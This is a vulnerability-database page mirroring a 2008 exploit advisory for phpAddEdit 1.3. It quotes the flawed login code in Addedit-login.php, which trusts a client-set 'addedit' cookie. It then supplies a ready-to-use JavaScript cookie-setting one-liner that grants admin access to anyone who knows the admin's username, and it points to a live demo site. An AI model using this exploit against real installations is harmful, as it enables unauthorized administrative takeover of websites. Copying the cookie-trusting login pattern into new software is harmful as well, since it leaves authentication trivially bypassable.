Lucene search
K

phpAddEdit 1.3 Login Bypass

🗓️ 12 Dec 2008 00:00:00Reported by X0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

PhpAddEdit 1.3 Login Bypass by x0r (Evolution Team), exploit via Addedit-login.php, admin cookie vulnerabilit

Code
`-------------------------------------  
PhpAddEdit 1.3 Login By Pass   
-------------------------------------  
  
Found By: x0r ( Evolution Team )  
Email: [email protected]  
-------------------------------------  
  
Bug In: Addedit-login.php  
  
if (!$login_error) {  
// --- Set admin cookie so favorite form field will show up when I use  
the site...  
if ($_POST["rememberme"]) {  
$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));  
setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);  
} else {  
setcookie("addedit", $_POST["adminuser"]);  
}  
Header("Location: ./");  
}  
}  
  
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^  
-------------------------------------  
  
Exploit:  
  
javascript:document.cookie = "addedit=[adminuser]; path=/";  
  
es:  
  
javascript:document.cookie = "addedit=x0r; path=/";  
--------------------------------------  
Live Demo: http://www.phpaddedit.com/demo/  
--------------------------------------  
Greetz: Amore oggi +65 ti amo troppo.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation